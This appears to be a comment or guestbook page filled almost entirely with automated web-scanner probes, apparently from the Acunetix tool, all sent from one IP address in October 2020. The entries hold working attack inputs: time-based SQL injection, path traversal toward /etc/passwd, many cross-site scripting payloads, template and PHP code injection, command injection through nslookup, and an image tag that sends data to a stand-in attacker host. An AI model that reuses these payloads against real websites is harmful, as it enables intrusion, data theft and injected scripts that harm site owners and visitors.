e [niS0piGp'));select pg_sleep(9); -- ] 2020-10-28 21:57:44

1

e [116.113.93.82] 2020-10-28 21:57:44

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:57:44

1

e [116.113.93.82] 2020-10-28 21:57:44

Array

e [!(()&&!|*|*|] 2020-10-28 21:57:43

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:57:43

1

e [aVrX1RW8');select pg_sleep(9); -- ] 2020-10-28 21:57:43

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:57:43

1

e [116.113.93.82] 2020-10-28 21:57:43

1

e [116.113.93.82] 2020-10-28 21:57:43

12345'"\'\");|]*{ <>

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:57:43

1

e [116.113.93.82&n958004=v904606] 2020-10-28 21:57:42

1

e [)] 2020-10-28 21:57:42

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:57:42

1

e [xcDi7f7u';select pg_sleep(6); -- ] 2020-10-28 21:57:42

1

e [116.113.93.82] 2020-10-28 21:57:42

e [116.113.93.82] 2020-10-28 21:57:42

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:57:42

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:57:41

1

e [116.113.93.82] 2020-10-28 21:57:41

1

e [tFVLvj9N'; waitfor delay '0:0:6' -- ] 2020-10-28 21:57:41

1

e [%2fetc%2fpasswd] 2020-10-28 21:57:40

1

e [116.113.93.82] 2020-10-28 21:57:40

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 21:57:40

1

e [116.113.93.82<input autofocus onfocus=3zut(9202)>] 2020-10-28 21:57:40

1

e [116.113.93.82] 2020-10-28 21:57:40

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:57:40

1

e [/etc/passwd] 2020-10-28 21:57:39

1

e [116.113.93.82] 2020-10-28 21:57:39

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 21:57:39

1

e [116.113.93.82] 2020-10-28 21:57:39

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:57:38

1

e [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 21:57:37

1

e [116.113.93.82] 2020-10-28 21:57:37

${9999103+10000362}

e [116.113.93.82] 2020-10-28 21:57:37

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:57:37

1

e [116.113.93.82] 2020-10-28 21:57:37

&nslookup FjoNgIOK&'\"`0&nslookup FjoNgIOK&`'

e [] 2020-10-28 21:57:37

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 21:57:36

1

e [116.113.93.82] 2020-10-28 21:57:36

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [Array] 2020-10-28 21:57:36

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:57:36

1

e [116.113.93.82] 2020-10-28 21:57:36

$(nslookup lqvhJWJB)

e [${9999387+9999685}] 2020-10-28 21:57:35

1

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 21:57:35

1

e [116.113.93.82] 2020-10-28 21:57:35

set|set&set

e [Array] 2020-10-28 21:57:35

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:57:35

1

e [116.113.93.82] 2020-10-28 21:57:35

"+response.write(9910912*9295677)+"

e [-1" OR 2+227-227-1=0+0+0+1 -- ] 2020-10-28 21:57:34

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:57:34

1

e [12345'"\'\");|]*{ <>] 2020-10-28 21:57:34

1

e [116.113.93.82] 2020-10-28 21:57:34

'+response.write(9910912*9295677)+'

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:57:34

1

e [116.113.93.82<ScRiPt>3zut(9371)</sCripT>] 2020-10-28 21:57:34

1

e [-1' OR 2+381-381-1=0+0+0+1 or 'fYps9wsn'='] 2020-10-28 21:57:33

1

e [] 2020-10-28 21:57:33

1

e [116.113.93.82] 2020-10-28 21:57:33

response.write(9910912*9295677)

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:57:33

1

e [-1' OR 2+629-629-1=0+0+0+1 -- ] 2020-10-28 21:57:32

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:57:32

1

e [116.113.93.82] 2020-10-28 21:57:31

BoQrCbM1

e [-1 OR 2+907-907-1=0+0+0+1] 2020-10-28 21:57:31

1

e [116.113.93.82\u003CScRiPt\3zut(9732)\u003C/sCripT\u003E] 2020-10-28 21:57:31

1

e [&nslookup X8gGVJdS&'\"`0&nslookup X8gGVJdS&`'] 2020-10-28 21:57:31

1

e [-1 OR 2+354-354-1=0+0+0+1 -- ] 2020-10-28 21:57:30

1

e [$(nslookup w9iCuQL5)] 2020-10-28 21:57:30

1

e [bmqVQVpn] 2020-10-28 21:57:29

1

e [mZFQMCWd] 2020-10-28 21:57:29

1

e ["+response.write(9567886*9736938)+"] 2020-10-28 21:57:29

1

e [set|set&set] 2020-10-28 21:57:28

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%33%7A%75%74%289325%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:57:28

1

e [116.113.93.82] 2020-10-28 21:57:28

1

e ['+response.write(9567886*9736938)+'] 2020-10-28 21:57:27

1

e [116.113.93.82] 2020-10-28 21:57:26

1

e [response.write(9567886*9736938)] 2020-10-28 21:57:26

1

e [116.113.93.82<img/src=">" onerror=alert(9575)>] 2020-10-28 21:57:25

1

e [116.113.93.82<img src=xyz OnErRor=3zut(9448)>] 2020-10-28 21:57:23

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=3zut(9791)>] 2020-10-28 21:57:20

1

e [116.113.93.82<body onload=3zut(9280)>] 2020-10-28 21:57:17

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9990'>] 2020-10-28 21:57:14

1

e [116.113.93.82<isindex type=image src=1 onerror=3zut(9800)>] 2020-10-28 21:57:12

1

e [116.113.93.82<svg ] 2020-10-28 21:57:09

1

e [116.113.93.82<video><source onerror="javascript:3zut(9203)">] 2020-10-28 21:57:05

1

e [116.113.93.82<ScRiPt >3zut(9634)</ScRiPt>] 2020-10-28 21:57:02

1

e [116.113.93.82] 2020-10-28 21:57:01

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:57:01

1

e [116.113.93.82] 2020-10-28 21:57:00

1

e [116.113.93.82] 2020-10-28 21:57:00

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:56:59

3yEGLMaV'));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:56:59

/WEB-INF/web.xml

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9473></ScRiPt>] 2020-10-28 21:56:59

1

e [116.113.93.82] 2020-10-28 21:56:58

OihR1ELs');select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:56:58

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:56:57

PKGfwQht';select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:56:57

file:///etc/passwd

e [116.113.93.82<ScRiPt >3zut(9736)</ScRiPt>] 2020-10-28 21:56:56

1

e [116.113.93.82] 2020-10-28 21:56:55

-1));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:56:55

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:56:55

..

e [116.113.93.82] 2020-10-28 21:56:54

-1);select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:56:54

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:56:54

-1;select pg_sleep(3); --

e [116.113.93.82<ScR<ScRiPt>IpT>3zut(9878)</sCr<ScRiPt>IpT>] 2020-10-28 21:56:53

1

e [116.113.93.82] 2020-10-28 21:56:53

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 21:56:53

nQEMvPnw'; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:56:52

1 waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:56:52

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 21:56:50

%2fetc%2fpasswd

e [116.113.93.82<script>3zut(9966)</script>] 2020-10-28 21:56:50

1

e [116.113.93.82] 2020-10-28 21:56:50

-1); waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:56:49

-1; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:56:48

/etc/passwd

e [116.113.93.82] 2020-10-28 21:56:48

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82] 2020-10-28 21:56:47

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82<WMOUP0>XQELF[!+!]</WMOUP0>] 2020-10-28 21:56:47

1

e [116.113.93.82] 2020-10-28 21:56:46

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 21:56:46

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:56:45

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:56:45

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 21:56:44

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82<ScRiPt >3zut(9758)</ScRiPt>] 2020-10-28 21:56:44

1

e [116.113.93.82] 2020-10-28 21:56:44

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:56:43

-1" OR 2+699-699-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:56:43

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 21:56:43

-1' OR 2+378-378-1=0+0+0+1 or 'rEX8INAW'='

e [116.113.93.82] 2020-10-28 21:56:42

../../../../../../../../../../../../../../../proc/version

e [{{9999332*9999241}}] 2020-10-28 21:56:41

1

e [116.113.93.82] 2020-10-28 21:56:41

-1' OR 2+748-748-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:56:41

e [116.113.93.82] 2020-10-28 21:56:41

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 21:56:40

-1 OR 2+418-418-1=0+0+0+1

e [116.113.93.82] 2020-10-28 21:56:40

e [116.113.93.82] 2020-10-28 21:56:39

-1 OR 2+659-659-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:56:39

JyI=

e [acux7913] 2020-10-28 21:56:38

1

e [116.113.93.82] 2020-10-28 21:56:38

@@c6FS6

e [116.113.93.82] 2020-10-28 21:56:38

uKsfpkJF

e [116.113.93.82] 2020-10-28 21:56:36

1

e [116.113.93.82] 2020-10-28 21:56:36

1

e [116.113.93.82] 2020-10-28 21:56:35

1

e [116.113.93.82] 2020-10-28 21:56:35

\

e [acu4465<s1﹥s2ʺs3ʹuca4465] 2020-10-28 21:56:35

1

e [116.113.93.82] 2020-10-28 21:56:34

1'"

e [116.113.93.829909171] 2020-10-28 21:56:32

1

e [116.113.93.82] 2020-10-28 21:56:30

<!--

e ['"()&%<acx><ScRiPt >3zut(9103)</ScRiPt>] 2020-10-28 21:56:29

1

e [116.113.93.82] 2020-10-28 21:56:29

'"

e [116.113.93.82] 2020-10-28 21:56:27

create/.

e [116.113.93.82] 2020-10-28 21:56:26

/www.vulnweb.com

e [116.113.93.82'"()&%<acx><ScRiPt >3zut(9137)</ScRiPt>] 2020-10-28 21:56:26

1

e [116.113.93.82] 2020-10-28 21:56:26

create

e [] 2020-10-28 21:56:25

1

e [<!--] 2020-10-28 21:56:25

1

e [116.113.93.82] 2020-10-28 21:56:25

create

e [116.113.93.82] 2020-10-28 21:56:25

${@print(md5(acunetix_wvs_security_test))}\

e ['"] 2020-10-28 21:56:24

1

e [] 2020-10-28 21:56:24

1

e [116.113.93.82] 2020-10-28 21:56:24

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [/www.vulnweb.com] 2020-10-28 21:56:24

1

e [116.113.93.82] 2020-10-28 21:56:24

${@print(md5(acunetix_wvs_security_test))}

e [JyI=] 2020-10-28 21:56:24

1

e [116.113.93.82] 2020-10-28 21:56:23

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:56:23

";print(md5(acunetix_wvs_security_test));$a="

e [@@6Dzyw] 2020-10-28 21:56:23

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:56:22

1

e [116.113.93.82] 2020-10-28 21:56:22

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 21:56:22

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:56:22

';print(md5(acunetix_wvs_security_test));$a='

e [1] 2020-10-28 21:56:22

1

e [116.113.93.82] 2020-10-28 21:56:22

http://hitYO6RbIDRgw.bxss.me/

e [116.113.93.82] 2020-10-28 21:56:21

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [create/.] 2020-10-28 21:56:21

1

e [\] 2020-10-28 21:56:21

1

e [116.113.93.82] 2020-10-28 21:56:21

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 21:56:20

Http://testasp.vulnweb.com/t/fit.txt

e [WEB-INF\web.xml] 2020-10-28 21:56:20

1

e [create] 2020-10-28 21:56:20

1

e [1'"] 2020-10-28 21:56:19

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:56:19

1

e [http://hitQqq4gAlRqT.bxss.me/] 2020-10-28 21:56:19

1

e [116.113.93.82] 2020-10-28 21:56:19

1some_inexistent_file_with_long_name.jpg

e [create] 2020-10-28 21:56:18

1

e [WEB-INF/web.xml] 2020-10-28 21:56:18

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:56:18

1

e [116.113.93.82] 2020-10-28 21:56:17

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 21:56:17

^(#$!@#$)(()))******

e [/WEB-INF/web.xml] 2020-10-28 21:56:17

1

e [116.113.93.82] 2020-10-28 21:56:16

1

e [116.113.93.82] 2020-10-28 21:56:16

!(()&&!|*|*|

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:56:16

1

e [116.113.93.82] 2020-10-28 21:56:15

1

e [116.113.93.82] 2020-10-28 21:56:15

1

e [116.113.93.82] 2020-10-28 21:56:15

'"()

e [116.113.93.82] 2020-10-28 21:56:15

)

e [file:///etc/passwd] 2020-10-28 21:56:15

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:56:14

1

e [2LYjyKrr'));select pg_sleep(3); -- ] 2020-10-28 21:56:14

1

e [116.113.93.82] 2020-10-28 21:56:14

Array

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:56:14

1

e [116.113.93.82] 2020-10-28 21:56:14

Array

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:56:14

1

e [q1ybIiL6');select pg_sleep(3); -- ] 2020-10-28 21:56:13

1

e [..] 2020-10-28 21:56:13

1

e [116.113.93.82] 2020-10-28 21:56:13

Array

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:56:13

1

e [116.113.93.82] 2020-10-28 21:56:13

1&n951026=v955663

e [mxPA3wb5';select pg_sleep(9); -- ] 2020-10-28 21:56:13

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:56:13

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:56:12

1

e [116.113.93.82] 2020-10-28 21:56:12

12345'"\'\");|]*{ <>

e [testasp.vulnweb.com] 2020-10-28 21:56:12

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:56:11

1

e [L81cIaKE'; waitfor delay '0:0:9' -- ] 2020-10-28 21:56:11

1

e ['"()] 2020-10-28 21:56:11

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:56:11

1

e [^(#$!@#$)(()))******] 2020-10-28 21:56:11

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:56:10

1

e [116.113.93.82] 2020-10-28 21:56:10

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:56:10

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 21:56:10

1

e [Array] 2020-10-28 21:56:10

1

e [!(()&&!|*|*|] 2020-10-28 21:56:09

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:56:09

1

e [%2fetc%2fpasswd] 2020-10-28 21:56:09

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 21:56:09

1

e [)] 2020-10-28 21:56:08

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 21:56:08

1

e [/etc/passwd] 2020-10-28 21:56:08

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:56:08

1

e [116.113.93.82&n977777=v903600] 2020-10-28 21:56:08

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 21:56:07

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:56:07

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:56:07

1

e [116.113.93.82] 2020-10-28 21:56:06

${9999195+9999622}

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 21:56:06

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:56:05

1

e [116.113.93.82] 2020-10-28 21:56:05

1

e [116.113.93.82] 2020-10-28 21:56:05

&nslookup C6eh7nx6&'\"`0&nslookup C6eh7nx6&`'

e [116.113.93.82] 2020-10-28 21:56:05

"+response.write(9739874*9347414)+"

e [Array] 2020-10-28 21:56:05

1

e [-1" OR 2+485-485-1=0+0+0+1 -- ] 2020-10-28 21:56:05

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:56:04

1

e [116.113.93.82] 2020-10-28 21:56:04

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [116.113.93.82] 2020-10-28 21:56:04

$(nslookup iZ5ddpTp)

e [116.113.93.82] 2020-10-28 21:56:04

'+response.write(9739874*9347414)+'

e [${9999855+9999990}] 2020-10-28 21:56:04

1

e [Array] 2020-10-28 21:56:04

1

e [-1' OR 2+191-191-1=0+0+0+1 or '3rIWAQa3'='] 2020-10-28 21:56:04

1

e [116.113.93.82] 2020-10-28 21:56:04

set|set&set

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:56:04

1

e [116.113.93.82] 2020-10-28 21:56:04

response.write(9739874*9347414)

e [12345'"\'\");|]*{ <>] 2020-10-28 21:56:03

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:56:03

1

e [-1' OR 2+323-323-1=0+0+0+1 -- ] 2020-10-28 21:56:03

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:56:03

1

e [] 2020-10-28 21:56:02

1

e [-1 OR 2+829-829-1=0+0+0+1] 2020-10-28 21:56:02

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:56:02

1

e [-1 OR 2+658-658-1=0+0+0+1 -- ] 2020-10-28 21:56:01

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:56:01

1

e ["+response.write(9700796*9456165)+"] 2020-10-28 21:55:59

1

e [&nslookup mfYGxXXI&'\"`0&nslookup mfYGxXXI&`'] 2020-10-28 21:55:59

1

e [116.113.93.82] 2020-10-28 21:55:59

mrqT3rKD

e [Gzjz0qqk] 2020-10-28 21:55:59

1

e ['+response.write(9700796*9456165)+'] 2020-10-28 21:55:58

1

e [116.113.93.82] 2020-10-28 21:55:58

1

e [$(nslookup ERw97uN6)] 2020-10-28 21:55:58

1

e [response.write(9700796*9456165)] 2020-10-28 21:55:57

1

e [kpO4akbL] 2020-10-28 21:55:57

1

e [116.113.93.82] 2020-10-28 21:55:57

1

e [set|set&set] 2020-10-28 21:55:57

1

e [116.113.93.82] 2020-10-28 21:55:55

1

e [116.113.93.82] 2020-10-28 21:55:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:31:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:31:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:31:37

1

GRLpGpAG"><script>iu0T(9831)</script> [116.113.93.82] 2020-10-28 18:31:33

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(iu0T(9620))'bad=" [116.113.93.82] 2020-10-28 18:31:27

1

[116.113.93.82] 2020-10-28 18:31:23

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%69%75%30%54%28%39%34%39%32%29%22 [116.113.93.82] 2020-10-28 18:31:20

1

GRLpGpAG\u0022onmouseover=iu0T(9453)\u0022 [116.113.93.82] 2020-10-28 18:31:16

1

GRLpGpAG" dINO=iu0T([!+!]) ZGv=" [116.113.93.82] 2020-10-28 18:31:11

1

GRLpGpAG"onmouseover=iu0T(9061)" [116.113.93.82] 2020-10-28 18:31:07

1

GRLpGpAG<fzbBjv< [116.113.93.82] 2020-10-28 18:31:05

1

GRLpGpAG<img sRc='http://attacker-9774/log.php? [116.113.93.82] 2020-10-28 18:31:02

1

GRLpGpAG<8NJ7un x=9911> [116.113.93.82] 2020-10-28 18:30:59

1

GRLpGpAG<ifRAme sRc=9935.com></IfRamE> [116.113.93.82] 2020-10-28 18:30:56

1

GRLpGpAG<WKCIUY>MHNS2[!+!]</WKCIUY> [116.113.93.82] 2020-10-28 18:30:54

1

GRLpGpAG1Jyy6 <ScRiPt >iu0T(9830)</ScRiPt> [116.113.93.82] 2020-10-28 18:30:50

1

GRLpGpAG<% contenteditable onresize=iu0T(9520)> [116.113.93.82] 2020-10-28 18:30:47

1

GRLpGpAG}body{acu:Expre/**/SSion(iu0T(9764))} [116.113.93.82] 2020-10-28 18:30:38

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9556);//><!-- --> [116.113.93.82] 2020-10-28 18:30:36

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 18:30:29

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 18:30:26

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 18:30:21

1

GRLpGpAG<input autofocus onfocus=iu0T(9821)> [116.113.93.82] 2020-10-28 18:30:15

1

[116.113.93.82] 2020-10-28 18:30:11

1

GRLpGpAG<ScRiPt>iu0T(9768)</sCripT> [116.113.93.82] 2020-10-28 18:30:07

1

GRLpGpAG\u003CScRiPt\iu0T(9861)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 18:30:03

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%69%75%30%54%289720%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 18:29:57

1

GRLpGpAG<img/src=">" onerror=alert(9244)> [116.113.93.82] 2020-10-28 18:29:51

1

GRLpGpAG<img src=xyz OnErRor=iu0T(9952)> [116.113.93.82] 2020-10-28 18:29:46

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=iu0T(9676)> [116.113.93.82] 2020-10-28 18:29:42

1

GRLpGpAG<body onload=iu0T(9261)> [116.113.93.82] 2020-10-28 18:29:37

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9357'> [116.113.93.82] 2020-10-28 18:29:33

1

GRLpGpAG<isindex type=image src=1 onerror=iu0T(9991)> [116.113.93.82] 2020-10-28 18:29:30

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 18:29:26

1

GRLpGpAG<video><source onerror="javascript:iu0T(9307)"> [116.113.93.82] 2020-10-28 18:29:22

1

GRLpGpAG<ScRiPt >iu0T(9390)</ScRiPt> [116.113.93.82] 2020-10-28 18:29:17

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9376></ScRiPt> [116.113.93.82] 2020-10-28 18:29:14

1

GRLpGpAG<ScRiPt >iu0T(9166)</ScRiPt> [116.113.93.82] 2020-10-28 18:29:11

1

GRLpGpAG<ScR<ScRiPt>IpT>iu0T(9252)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 18:29:08

1

GRLpGpAG<script>iu0T(9470)</script> [116.113.93.82] 2020-10-28 18:29:06

1

GRLpGpAG<WOVQ6N>ZQEZE[!+!]</WOVQ6N> [116.113.93.82] 2020-10-28 18:29:04

1

GRLpGpAG<ScRiPt >iu0T(9601)</ScRiPt> [116.113.93.82] 2020-10-28 18:28:59

1

{{9999068*10000046}} [116.113.93.82] 2020-10-28 18:28:56

1

acux3357 [116.113.93.82] 2020-10-28 18:28:53

1

acu4527<s1﹥s2ʺs3ʹuca4527 [116.113.93.82] 2020-10-28 18:28:46

1

{{9999834*10000372}} [116.113.93.82] 2020-10-28 18:28:44

1

acux9267 [116.113.93.82] 2020-10-28 18:28:37

1

acu8534<s1﹥s2ʺs3ʹuca8534 [116.113.93.82] 2020-10-28 18:28:35

1

GRLpGpAG9106502 [116.113.93.82] 2020-10-28 18:28:27

1

'"()&%<acx><ScRiPt >iu0T(9506)</ScRiPt> [116.113.93.82] 2020-10-28 18:28:24

1

GRLpGpAG'"()&%<acx><ScRiPt >iu0T(9352)</ScRiPt> [116.113.93.82] 2020-10-28 18:28:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:28:14

1<fahDuj<

GRLpGpAG [116.113.93.82] 2020-10-28 18:28:11

1<img sRc='http://attacker-9448/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 18:28:07

1<P7mwdy x=9242>

GRLpGpAG [116.113.93.82] 2020-10-28 18:28:05

1<ifRAme sRc=9272.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 18:28:01

1<WEO309>OIHSV[!+!]</WEO309>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:57

1JJZLs <ScRiPt >iu0T(9022)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:52

1<% contenteditable onresize=iu0T(9705)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:49

1}body{acu:Expre/**/SSion(iu0T(9721))}

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:47

1<img<!-- --> src=x onerror=alert(9237);//><!-- -->

